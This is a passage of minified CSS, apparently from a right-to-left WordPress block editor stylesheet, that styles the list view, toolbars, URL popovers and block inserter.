.2s; } } .block-editor-list-view-leaf.is-displacement-up{ transform:translateY(-32px); } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-displacement-down{ transition:transform .2s; } } .block-editor-list-view-leaf.is-displacement-down{ transform:translateY(32px); } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-after-dragged-blocks{ transition:transform .2s; } } .block-editor-list-view-leaf.is-after-dragged-blocks{ transform:translateY(calc(var(--wp-admin--list-view-dragged-items-height, 32px)*-1)); } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-up{ transition:transform .2s; } } .block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-up{ transform:translateY(calc(-32px + var(--wp-admin--list-view-dragged-items-height, 32px)*-1)); } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-down{ transition:transform .2s; } } .block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-down{ transform:translateY(calc(32px + var(--wp-admin--list-view-dragged-items-height, 32px)*-1)); } .block-editor-list-view-leaf.is-dragging{ opacity:0; pointer-events:none; right:0; z-index:-9999; } .block-editor-list-view-leaf .block-editor-list-view-block-contents{ align-items:center; border-radius:2px; box-sizing:border-box; color:inherit; display:flex; font-family:inherit; font-size:13px; font-weight:400; height:32px; margin:0; padding:6px 0 6px 4px; position:relative; text-align:right; text-decoration:none; white-space:nowrap; width:100%; } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf .block-editor-list-view-block-contents{ transition:box-shadow .1s linear; } } .components-modal__content .block-editor-list-view-leaf .block-editor-list-view-block-contents{ padding-left:0; padding-right:0; } .block-editor-list-view-leaf .block-editor-list-view-block-contents:focus,.block-editor-list-view-leaf.is-nesting .block-editor-list-view-block-contents{ box-shadow:none; } .block-editor-list-view-leaf .block-editor-list-view-block-contents:focus:after,.block-editor-list-view-leaf.is-nesting .block-editor-list-view-block-contents:after{ border-radius:inherit; bottom:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); content:""; left:-29px; pointer-events:none; position:absolute; right:0; top:0; z-index:2; } .block-editor-list-view-leaf.has-single-cell .block-editor-list-view-block-contents:focus:after{ left:0; } .block-editor-list-view-leaf .block-editor-list-view-block__menu:focus,.block-editor-list-view-leaf.is-nesting .block-editor-list-view__menu{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); z-index:1; } .block-editor-list-view-leaf.is-visible .block-editor-list-view-block-contents{ opacity:1; } @keyframes __wp-base-styles-fade-in{ 0%{ opacity:0; } to{ opacity:1; } } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-visible .block-editor-list-view-block-contents{ animation:__wp-base-styles-fade-in .08s linear 0s; animation-fill-mode:forwards; } } .block-editor-list-view-leaf .block-editor-block-icon{ flex:0 0 24px; margin-left:4px; } .block-editor-list-view-leaf .block-editor-list-view-block__contents-cell,.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell{ padding:0; } .block-editor-list-view-leaf .block-editor-list-view-block__menu-cell,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell{ line-height:0; vertical-align:middle; width:28px; } .block-editor-list-view-leaf .block-editor-list-view-block__menu-cell>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell>*{ opacity:0; } .block-editor-list-view-leaf .block-editor-list-view-block__menu-cell.is-visible>*,.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell:focus-within>*,.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell:hover>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell.is-visible>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell:focus-within>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell:hover>*{ opacity:1; } .block-editor-list-view-leaf .block-editor-list-view-block__mover-cell-alignment-wrapper{ align-items:center; display:flex; flex-direction:column; height:100%; } .block-editor-list-view-leaf .block-editor-block-mover-button{ height:24px; position:relative; width:36px; } .block-editor-list-view-leaf .block-editor-block-mover-button svg{ height:24px; position:relative; } .block-editor-list-view-leaf .block-editor-block-mover-button.is-up-button{ align-items:flex-end; margin-top:-6px; } .block-editor-list-view-leaf .block-editor-block-mover-button.is-up-button svg{ bottom:-4px; } .block-editor-list-view-leaf .block-editor-block-mover-button.is-down-button{ align-items:flex-start; margin-bottom:-6px; } .block-editor-list-view-leaf .block-editor-block-mover-button.is-down-button svg{ top:-4px; } .block-editor-list-view-leaf .block-editor-block-mover-button:before{ height:16px; left:0; min-width:100%; right:0; } .block-editor-list-view-leaf .block-editor-inserter__toggle{ background:#1e1e1e; color:#fff; height:24px; margin:6px 1px 6px 6px; min-width:24px; } .block-editor-list-view-leaf .block-editor-inserter__toggle:active{ color:#fff; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__label-wrapper svg{ position:relative; right:2px; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__title{ flex:1; position:relative; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__title .components-truncate{ position:absolute; transform:translateY(-50%); width:100%; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__anchor-wrapper{ max-width:min(110px, 40%); position:relative; width:100%; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__anchor{ left:0; position:absolute; transform:translateY(-50%); } .block-editor-list-view-leaf.is-selected .block-editor-list-view-block-select-button__anchor{ background:#0000004d; color:#fff; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__block-visibility,.block-editor-list-view-leaf .block-editor-list-view-block-select-button__lock,.block-editor-list-view-leaf .block-editor-list-view-block-select-button__sticky{ line-height:0; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__images{ display:flex; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__image{ background-size:cover; border-radius:1px; height:18px; width:18px; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__image:not(:only-child){ box-shadow:0 0 0 2px #fff; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__image:not(:first-child){ margin-right:-6px; } .block-editor-list-view-leaf.is-selected .block-editor-list-view-block-select-button__image:not(:only-child){ box-shadow:0 0 0 2px var(--wp-admin-theme-color); } .block-editor-list-view-draggable-chip{ opacity:.8; } .block-editor-list-view-appender__cell .block-editor-list-view-appender__container,.block-editor-list-view-appender__cell .block-editor-list-view-block__contents-container,.block-editor-list-view-block__contents-cell .block-editor-list-view-appender__container,.block-editor-list-view-block__contents-cell .block-editor-list-view-block__contents-container{ display:flex; } .block-editor-list-view__expander{ cursor:pointer; height:24px; width:24px; } .block-editor-list-view-leaf[aria-level] .block-editor-list-view__expander{ margin-right:192px; } .block-editor-list-view-leaf[aria-level="1"] .block-editor-list-view__expander{ margin-right:0; } .block-editor-list-view-leaf[aria-level="2"] .block-editor-list-view__expander{ margin-right:24px; } .block-editor-list-view-leaf[aria-level="3"] .block-editor-list-view__expander{ margin-right:48px; } .block-editor-list-view-leaf[aria-level="4"] .block-editor-list-view__expander{ margin-right:72px; } .block-editor-list-view-leaf[aria-level="5"] .block-editor-list-view__expander{ margin-right:96px; } .block-editor-list-view-leaf[aria-level="6"] .block-editor-list-view__expander{ margin-right:120px; } .block-editor-list-view-leaf[aria-level="7"] .block-editor-list-view__expander{ margin-right:144px; } .block-editor-list-view-leaf[aria-level="8"] .block-editor-list-view__expander{ margin-right:168px; } .block-editor-list-view-leaf .block-editor-list-view__expander{ visibility:hidden; } .block-editor-list-view-leaf[data-expanded=true] .block-editor-list-view__expander svg{ visibility:visible; } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf[data-expanded=true] .block-editor-list-view__expander svg{ transition:transform .2s ease; } } .block-editor-list-view-leaf[data-expanded=true] .block-editor-list-view__expander svg{ transform:rotate(-90deg); } .block-editor-list-view-leaf[data-expanded=false] .block-editor-list-view__expander svg{ transform:rotate(0deg); visibility:visible; } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf[data-expanded=false] .block-editor-list-view__expander svg{ transition:transform .2s ease; } } .block-editor-list-view-drop-indicator{ pointer-events:none; } .block-editor-list-view-drop-indicator .block-editor-list-view-drop-indicator__line{ background:var(--wp-admin-theme-color); border-radius:4px; height:4px; } .block-editor-list-view-drop-indicator--preview{ pointer-events:none; } .block-editor-list-view-drop-indicator--preview .components-popover__content{ overflow:hidden !important; } .block-editor-list-view-drop-indicator--preview .block-editor-list-view-drop-indicator__line{ background:rgba(var(--wp-admin-theme-color--rgb), .04); border-radius:4px; height:32px; overflow:hidden; } .block-editor-list-view-drop-indicator--preview .block-editor-list-view-drop-indicator__line--darker{ background:rgba(var(--wp-admin-theme-color--rgb), .09); } .block-editor-list-view-placeholder{ height:32px; margin:0; padding:0; } .list-view-appender .block-editor-inserter__toggle{ background-color:#1e1e1e; color:#fff; height:24px; margin:8px 24px 0 0; padding:0; } .list-view-appender .block-editor-inserter__toggle.has-icon.is-next-40px-default-size{ min-width:24px; } .list-view-appender .block-editor-inserter__toggle:focus,.list-view-appender .block-editor-inserter__toggle:hover{ background:var(--wp-admin-theme-color); color:#fff; } .list-view-appender__description{ display:none; } .block-editor-media-placeholder__url-input-form{ min-width:260px; } @media (min-width:600px){ .block-editor-media-placeholder__url-input-form{ width:300px; } } .block-editor-media-placeholder__url-input-form input{ direction:ltr; } .modal-open .block-editor-media-replace-flow__options{ display:none; } .block-editor-media-replace-flow__indicator{ margin-right:4px; } .block-editor-media-replace-flow__media-upload-menu:not(:empty)+.block-editor-media-flow__url-input{ border-top:1px solid #1e1e1e; margin-top:8px; padding-bottom:8px; } .block-editor-media-flow__url-input{ margin-left:-8px; margin-right:-8px; padding:16px; } .block-editor-media-flow__url-input .block-editor-media-replace-flow__image-url-label{ display:block; margin-bottom:8px; top:16px; } .block-editor-media-flow__url-input .block-editor-link-control{ width:300px; } .block-editor-media-flow__url-input .block-editor-link-control .block-editor-url-input{ margin:0; padding:0; } .block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__tools{ justify-content:flex-end; padding:16px var(--wp-admin-border-width-focus) var(--wp-admin-border-width-focus); } .block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__search-item.is-current{ padding:0; width:auto; } .block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__search-input.block-editor-link-control__search-input input[type=text]{ margin:0; width:100%; } .block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__search-actions{ padding:8px 0 0; } .block-editor-media-flow__error{ max-width:255px; padding:0 20px 20px; } .block-editor-media-flow__error .components-with-notices-ui{ max-width:255px; } .block-editor-media-flow__error .components-with-notices-ui .components-notice__content{ overflow:hidden; word-wrap:break-word; } .block-editor-media-flow__error .components-with-notices-ui .components-notice__dismiss{ left:10px; position:absolute; } .block-editor-multi-selection-inspector__card{ padding:16px; } .block-editor-multi-selection-inspector__card-title{ font-weight:500; } .block-editor-multi-selection-inspector__card .block-editor-block-icon{ height:24px; margin-right:-2px; padding:0 3px; width:36px; } .block-editor-responsive-block-control{ border-bottom:1px solid #ccc; margin-bottom:28px; padding-bottom:14px; } .block-editor-responsive-block-control:last-child{ border-bottom:0; padding-bottom:0; } .block-editor-responsive-block-control__title{ margin:0 -3px .6em 0; } .block-editor-responsive-block-control__label{ font-weight:600; margin-bottom:.6em; margin-right:-3px; } .block-editor-responsive-block-control__inner{ margin-right:-1px; } .block-editor-responsive-block-control__toggle{ margin-right:1px; } .block-editor-responsive-block-control .components-base-control__help{ border:0; clip-path:inset(50%); height:1px; margin:-1px; overflow:hidden; padding:0; position:absolute; width:1px; word-wrap:normal !important; } .components-popover.block-editor-rich-text__inline-format-toolbar{ z-index:99998; } .components-popover.block-editor-rich-text__inline-format-toolbar .components-popover__content{ border-radius:2px; box-shadow:none; margin-bottom:8px; min-width:auto; outline:none; width:auto; } .components-popover.block-editor-rich-text__inline-format-toolbar .components-toolbar{ border-radius:2px; } .components-popover.block-editor-rich-text__inline-format-toolbar .components-toolbar-group{ background:none; } .components-popover.block-editor-rich-text__inline-format-toolbar .components-dropdown-menu__toggle,.components-popover.block-editor-rich-text__inline-format-toolbar .components-toolbar__control{ min-height:48px; min-width:48px; padding-left:12px; padding-right:12px; } .block-editor-rich-text__inline-format-toolbar-group .components-dropdown-menu__toggle{ justify-content:center; } .show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button.has-icon{ width:auto; } .show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button.has-icon svg{ display:none; } .show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button.has-icon:after{ content:attr(aria-label); } .block-editor-skip-to-selected-block{ position:absolute; top:-9999em; } .block-editor-skip-to-selected-block:focus{ background:#f1f1f1; font-size:14px; font-weight:600; z-index:100000; } .block-editor-tabbed-sidebar{ background-color:#fff; display:flex; flex-direction:column; flex-grow:1; height:100%; overflow:hidden; } .block-editor-tabbed-sidebar__tablist-and-close-button{ border-bottom:1px solid #ddd; display:flex; justify-content:space-between; padding-left:8px; } .block-editor-tabbed-sidebar__close-button{ align-self:center; background:#fff; order:1; } .block-editor-tabbed-sidebar__tablist{ margin-bottom:-1px; } .block-editor-tabbed-sidebar__tabpanel{ display:flex; flex-direction:column; flex-grow:1; overflow-y:auto; scrollbar-gutter:auto; } .block-editor-block-list__block .block-editor-url-input,.block-editor-url-input,.components-popover .block-editor-url-input{ flex-grow:1; padding:1px; position:relative; } @media (min-width:600px){ .block-editor-block-list__block .block-editor-url-input,.block-editor-url-input,.components-popover .block-editor-url-input{ min-width:300px; width:auto; } } .block-editor-block-list__block .block-editor-url-input.is-full-width,.block-editor-block-list__block .block-editor-url-input.is-full-width__suggestions,.block-editor-url-input.is-full-width,.block-editor-url-input.is-full-width__suggestions,.components-popover .block-editor-url-input.is-full-width,.components-popover .block-editor-url-input.is-full-width__suggestions{ width:100%; } .block-editor-block-list__block .block-editor-url-input .components-spinner,.block-editor-url-input .components-spinner,.components-popover .block-editor-url-input .components-spinner{ left:8px; margin:0; position:absolute; top:calc(50% - 8px); } .block-editor-url-input__suggestions{ max-height:200px; } @media not (prefers-reduced-motion){ .block-editor-url-input__suggestions{ transition:all .15s ease-in-out; } } .block-editor-url-input__suggestions{ overflow-y:auto; padding:4px 0; width:302px; } .block-editor-url-input .components-spinner,.block-editor-url-input__suggestions{ display:none; } @media (min-width:600px){ .block-editor-url-input .components-spinner,.block-editor-url-input__suggestions{ display:grid; } } .block-editor-url-input__suggestion{ background:#fff; border:none; box-shadow:none; color:#757575; cursor:pointer; display:block; font-size:13px; height:auto; min-height:36px; text-align:right; width:100%; } .block-editor-url-input__suggestion:hover{ background:#ddd; } .block-editor-url-input__suggestion.is-selected,.block-editor-url-input__suggestion:focus{ background:var(--wp-admin-theme-color-darker-20); color:#fff; outline:none; } .components-toolbar-group>.block-editor-url-input__button,.components-toolbar>.block-editor-url-input__button{ position:inherit; } .block-editor-url-input__button .block-editor-url-input__back{ margin-left:4px; overflow:visible; } .block-editor-url-input__button .block-editor-url-input__back:after{ background:#ddd; content:""; display:block; height:24px; left:-1px; position:absolute; width:1px; } .block-editor-url-input__button-modal{ background:#fff; border:1px solid #ddd; box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; } .block-editor-url-input__button-modal-line{ align-items:flex-start; display:flex; flex-direction:row; flex-grow:1; flex-shrink:1; min-width:0; } .block-editor-url-popover__additional-controls{ border-top:1px solid #1e1e1e; padding:8px; } .block-editor-url-popover__input-container{ padding:8px; } .block-editor-url-popover__row{ align-items:center; display:flex; gap:4px; } .block-editor-url-popover__row>:not(.block-editor-url-popover__settings-toggle){ flex-grow:1; gap:8px; } .block-editor-url-popover__additional-controls .components-button.has-icon{ height:auto; padding-left:8px; padding-right:8px; text-align:right; } .block-editor-url-popover__additional-controls .components-button.has-icon>svg{ margin-left:8px; } .block-editor-url-popover__settings-toggle{ flex-shrink:0; } .block-editor-url-popover__settings-toggle[aria-expanded=true] .dashicon{ transform:rotate(-180deg); } .block-editor-url-popover__settings{ border-top:1px solid #1e1e1e; display:block; padding:16px; } .block-editor-url-popover__link-editor,.block-editor-url-popover__link-viewer{ display:flex; } .block-editor-url-popover__link-viewer-url{ align-items:center; display:flex; flex-grow:1; flex-shrink:1; margin-left:8px; max-width:350px; min-width:150px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .block-editor-url-popover__link-viewer-url.has-invalid-link{ color:#cc1818; } .block-editor-url-popover__expand-on-click{ align-items:center; display:flex; min-width:350px; white-space:nowrap; } .block-editor-url-popover__expand-on-click .text{ flex-grow:1; } .block-editor-url-popover__expand-on-click .text p{ line-height:16px; margin:0; } .block-editor-url-popover__expand-on-click .text p.description{ color:#757575; font-size:12px; } .block-editor-hooks__block-hooks .components-toggle-control .components-h-stack .components-h-stack{ flex-direction:row; } .block-editor-hooks__block-hooks .block-editor-hooks__block-hooks-helptext{ color:#757575; font-size:12px; margin-bottom:16px; } div.block-editor-bindings__panel{ grid-template-columns:repeat(auto-fit, minmax(100%, 1fr)); } div.block-editor-bindings__panel button:hover .block-editor-bindings__item span{ color:inherit; } .border-block-support-panel .single-column{ grid-column:span 1; } .color-block-support-panel .block-editor-contrast-checker{ grid-column:span 2; margin-top:16px; } .color-block-support-panel .block-editor-contrast-checker .components-notice__content{ margin-left:0; } .color-block-support-panel.color-block-support-panel .color-block-support-panel__inner-wrapper{ row-gap:0; } .color-block-support-panel .block-editor-tools-panel-color-gradient-settings__item.first{ margin-top:0; } .dimensions-block-support-panel .single-column{ grid-column:span 1; } .block-editor-hooks__layout-constrained .components-base-control{ margin-bottom:0; } .block-editor-hooks__layout-constrained-helptext{ color:#757575; font-size:12px; margin-bottom:0; } .block-editor-hooks__flex-layout-justification-controls,.block-editor-hooks__flex-layout-orientation-controls{ margin-bottom:12px; } .block-editor-hooks__flex-layout-justification-controls legend,.block-editor-hooks__flex-layout-orientation-controls legend{ margin-bottom:8px; } .block-editor-hooks__grid-layout-columns-and-rows-controls,.block-editor-hooks__grid-layout-minimum-width-control{ border:0; margin:0; padding:0; } .block-editor__spacing-visualizer{ border-color:var(--wp-admin-theme-color); border-style:solid; bottom:0; box-sizing:border-box; left:0; opacity:.5; pointer-events:none; position:absolute; right:0; top:0; } .typography-block-support-panel .single-column{ grid-column:span 1; } .block-editor-block-toolbar{ display:flex; flex-grow:1; overflow-x:auto; overflow-y:hidden; position:relative; width:100%; } @media not (prefers-reduced-motion){ .block-editor-block-toolbar{ transition:border-color .1s linear,box-shadow .1s linear; } } @media (min-width:600px){ .block-editor-block-toolbar{ overflow:inherit; } } .block-editor-block-toolbar .components-toolbar,.block-editor-block-toolbar .components-toolbar-group{ background:none; border:0; border-left:1px solid #ddd; margin-bottom:-1px; margin-top:-1px; } .block-editor-block-toolbar.is-connected .block-editor-block-switcher .components-button:before{ background:color-mix(in srgb, var(--wp-block-synced-color) 10%, #0000); border-radius:2px; } .block-editor-block-toolbar.is-connected .block-editor-block-switcher .components-button .block-editor-block-icon,.block-editor-block-toolbar.is-connected .block-editor-block-switcher__no-switcher-icon[aria-disabled=true] .block-editor-block-icon,.block-editor-block-toolbar.is-synced .block-editor-block-switcher .components-button .block-editor-block-icon,.block-editor-block-toolbar.is-synced .block-editor-block-switcher__no-switcher-icon[aria-disabled=true] .block-editor-block-icon{ color:var(--wp-block-synced-color); } .block-editor-block-toolbar:has(>:last-child:empty)>:nth-last-child(2),.block-editor-block-toolbar:has(>:last-child:empty)>:nth-last-child(2) .components-toolbar,.block-editor-block-toolbar:has(>:last-child:empty)>:nth-last-child(2) .components-toolbar-group,.block-editor-block-toolbar>:last-child,.block-editor-block-toolbar>:last-child .components-toolbar,.block-editor-block-toolbar>:last-child .components-toolbar-group{ border-left:none; } .block-editor-block-toolbar .components-toolbar-group:empty{ display:none; } .block-editor-block-contextual-toolbar{ background-color:#fff; display:block; flex-shrink:3; position:sticky; top:0; width:100%; z-index:31; } .block-editor-block-contextual-toolbar.components-accessible-toolbar{ border:none; border-radius:0; } .block-editor-block-contextual-toolbar.is-unstyled{ box-shadow:0 1px 0 0 rgba(0,0,0,.133); } .block-editor-block-contextual-toolbar .block-editor-block-toolbar{ overflow:auto; overflow-y:hidden; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar::-webkit-scrollbar{ height:12px; width:12px; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar::-webkit-scrollbar-track{ background-color:initial; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:#e0e0e0; border:3px solid #0000; border-radius:8px; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus-within::-webkit-scrollbar-thumb,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus::-webkit-scrollbar-thumb,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:hover::-webkit-scrollbar-thumb{ background-color:#949494; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar{ scrollbar-color:#e0e0e0 #0000; scrollbar-gutter:stable both-edges; scrollbar-width:thin; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus-within,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:hover{ scrollbar-color:#949494 #0000; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar{ will-change:transform; } @media (hover:none){ .block-editor-block-contextual-toolbar .block-editor-block-toolbar{ scrollbar-color:#949494 #0000; } } .block-editor-block-contextual-toolbar .block-editor-block-toolbar{ scrollbar-gutter:auto; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar>:last-child .components-toolbar-group:after,.block-editor-block-contextual-toolbar .block-editor-block-toolbar>:last-child .components-toolbar:after,.block-editor-block-contextual-toolbar .block-editor-block-toolbar>:last-child:after{ display:none; } .block-editor-block-contextual-toolbar>.block-editor-block-toolbar{ flex-grow:0; width:auto; } .block-editor-block-contextual-toolbar .block-editor-block-parent-selector{ margin-bottom:-1px; margin-top:-1px; position:relative; } .block-editor-block-contextual-toolbar .block-editor-block-parent-selector:after{ align-items:center; background-color:#1e1e1e; border-radius:100%; content:""; display:inline-flex; height:2px; left:0; position:absolute; top:15px; width:2px; } .block-editor-block-toolbar__block-controls .block-editor-block-switcher .components-dropdown-menu__toggle .block-editor-block-icon,.block-editor-block-toolbar__block-controls .block-editor-block-switcher__no-switcher-icon .block-editor-block-icon{ margin:0 !important; width:24px !important; } .block-editor-block-toolbar__block-controls .components-toolbar-group{ padding:0; } .block-editor-block-toolbar .components-toolbar,.block-editor-block-toolbar .components-toolbar-group,.block-editor-rich-text__inline-format-toolbar-group .components-toolbar,.block-editor-rich-text__inline-format-toolbar-group .components-toolbar-group{ display:flex; flex-wrap:nowrap; } .block-editor-block-toolbar__slot{ display:inline-flex; } .show-icon-labels .block-editor-block-toolbar .components-button.has-icon:where(:not(.has-text)){ width:auto; } .show-icon-labels .block-editor-block-toolbar .components-button.has-icon:where(:not(.has-text)) svg{ display:none; } .show-icon-labels .block-editor-block-toolbar .components-button.has-icon:where(:not(.has-text)):after{ content:attr(aria-label); font-size:12px; } .show-icon-labels .components-accessible-toolbar .components-toolbar-group>div:first-child:last-child>.components-button.has-icon{ padding-left:6px; padding-right:6px; } .show-icon-labels .block-editor-block-switcher .components-dropdown-menu__toggle .block-editor-block-icon,.show-icon-labels .block-editor-block-switcher__no-switcher-icon .block-editor-block-icon{ height:0 !important; min-width:0 !important; width:0 !important; } .show-icon-labels .block-editor-block-parent-selector .block-editor-block-parent-selector__button{ border-bottom-left-radius:0; border-top-left-radius:0; padding-left:12px; padding-right:12px; text-wrap:nowrap; } .show-icon-labels .block-editor-block-parent-selector .block-editor-block-parent-selector__button .block-editor-block-icon{ width:0; } .show-icon-labels .block-editor-block-mover .block-editor-block-mover__move-button-container{ position:relative; width:auto; } @media (min-width:600px){ .show-icon-labels .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container:before{ background:#e0e0e0; content:""; height:1px; margin-top:-.5px; position:absolute; right:50%; top:50%; transform:translate(50%); width:100%; } } @media (min-width:782px){ .show-icon-labels .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container:before{ background:#1e1e1e; } } .show-icon-labels .block-editor-block-mover.is-horizontal .block-editor-block-mover-button,.show-icon-labels .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container{ padding-left:6px; padding-right:6px; } .show-icon-labels .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover-button{ padding-left:8px; padding-right:8px; } .show-icon-labels .block-editor-block-toolbar__block-controls .block-editor-block-mover{ border-right:1px solid #ddd; margin-left:-6px; margin-right:6px; white-space:nowrap; } .show-icon-labels .block-editor-block-mover .block-editor-block-mover__drag-handle.has-icon{ padding-left:12px; padding-right:12px; } .show-icon-labels .block-editor-block-contextual-toolbar .block-editor-block-mover.is-horizontal .block-editor-block-mover-button.block-editor-block-mover-button{ width:auto; } .show-icon-labels .components-toolbar,.show-icon-labels .components-toolbar-group{ flex-shrink:1; } .show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button+.components-button{ margin-right:6px; } .block-editor-block-toolbar-change-design-content-wrapper{ padding:12px; width:320px; } .block-editor-block-toolbar-change-design-content-wrapper .block-editor-block-patterns-list{ display:grid; grid-template-columns:1fr 1fr; grid-gap:12px; } .block-editor-block-toolbar-change-design-content-wrapper .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ margin-bottom:0; } .block-editor-block-toolbar-change-design-content-wrapper .block-editor-block-patterns-list .block-editor-inserter__media-list__list-item{ min-height:100px; } .block-editor-inserter{ background:none; border:none; display:inline-block; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; line-height:0; padding:0; } @media (min-width:782px){ .block-editor-inserter{ position:relative; } } .block-editor-inserter__main-area{ gap:16px; height:100%; position:relative; } .block-editor-inserter__main-area.show-as-tabs{ gap:0; } @media (min-width:782px){ .block-editor-inserter__main-area .block-editor-tabbed-sidebar{ width:350px; } } .block-editor-inserter__popover.is-quick .components-popover__content{ border:none; box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; outline:none; } .block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>*{ border-left:1px solid #ccc; border-right:1px solid #ccc; } .block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>:first-child{ border-radius:4px 4px 0 0; border-top:1px solid #ccc; } .block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>:last-child{ border-bottom:1px solid #ccc; border-radius:0 0 4px 4px; } .block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>.components-button{ border:1px solid #1e1e1e; } .block-editor-inserter__popover .block-editor-inserter__menu{ margin:-12px; } .block-editor-inserter__popover .block-editor-inserter__menu .block-editor-inserter__tablist{ top:60px; } .block-editor-inserter__popover .block-editor-inserter__menu .block-editor-inserter__main-area{ height:auto; overflow:visible; } .block-editor-inserter__popover .block-editor-inserter__menu .block-editor-inserter__preview-container{ display:none; } .block-editor-inserter__toggle.components-button{ align-items:center; border:none; cursor:pointer; display:inline-flex; outline:none; padding:0; } @media not (prefers-reduced-motion){ .block-editor-inserter__toggle.components-button{ transition:color .2s ease; } } .block-editor-inserter__menu{ height:100%; overflow:visible; position:relative; } @media (min-width:782px){ .block-editor-inserter__menu.show-panel{ width:630px; } } .block-editor-inserter__inline-elements{ margin-top:-1px; } .block-editor-inserter__menu.is-bottom:after{ border-bottom-color:#fff; } .components-popover.block-editor-inserter__popover{ z-index:99999; } .block-editor-inserter__search{ padding:16px 16px 0; } .block-editor-inserter__no-tab-container{ flex-grow:1; overflow-y:auto; position:relative; } .block-editor-inserter__panel-header{ align-items:center; display:inline-flex; padding:16px 16px 0; position:relative; } .block-editor-inserter__panel-content{ padding:16px; } .block-editor-inserter__panel-title,.block-editor-inserter__panel-title button{ color:#757575; font-size:11px; font-weight:500; margin:0 0 0 12px; text-transform:uppercase; } .block-editor-inserter__panel-dropdown select.components-select-control__input.components-select-control__input.components-select-control__input{ height:36px; line-height:36px; } .block-editor-inserter__panel-dropdown select{ border:none; } .block-editor-inserter__reusable-blocks-panel{ position:relative; text-align:left; } .block-editor-inserter__no-results,.block-editor-inserter__patterns-loading{ padding:32px; text-align:center; } .block-editor-inserter__child-blocks{ padding:0 16px; } .block-editor-inserter__parent-block-header{ align-items:center; display:flex; } .block-editor-inserter__parent-block-header h2{ font-size:13px; } .block-editor-inserter__parent-block-header .block-editor-block-icon{ margin-left:8px; } .block-editor-inserter__preview-container__popover{ top:16px !important; } .block-editor-inserter__preview-container{ display:none; max-height:calc(100% - 32px); overflow-y:hidden; padding:16px; width:280px; } @media (min-width:782px){ .block-editor-inserter__preview-container{ display:block; } } .block-editor-inserter__preview-container .block-editor-inserter__media-list__list-item{ height:100%; } .block-editor-inserter__preview-container .block-editor-block-card{ padding-bottom:4px; padding-left:0; padding-right:0; } .block-editor-inserter__insertable-blocks-at-selection{ border-bottom:1px solid #e0e0e0; } .block-editor-inserter__block-patterns-tabs-container,.block-editor-inserter__media-tabs-container{ display:flex; flex-direction:column; flex-grow:1; justify-content:space-between; padding:16px; } .block-editor-inserter__category-tablist{ margin-bottom:8px; } .block-editor-inserter__category-panel{ display:flex; flex-direction:column; outline:1px solid #0000; padding:0 16px; } @media (min-width:782px){ .block-editor-inserter__category-panel{ background:#f0f0f0; border-right:1px solid #e0e0e0; border-top:1px solid #e0e0e0; height:calc(100% + 1px); padding:0; 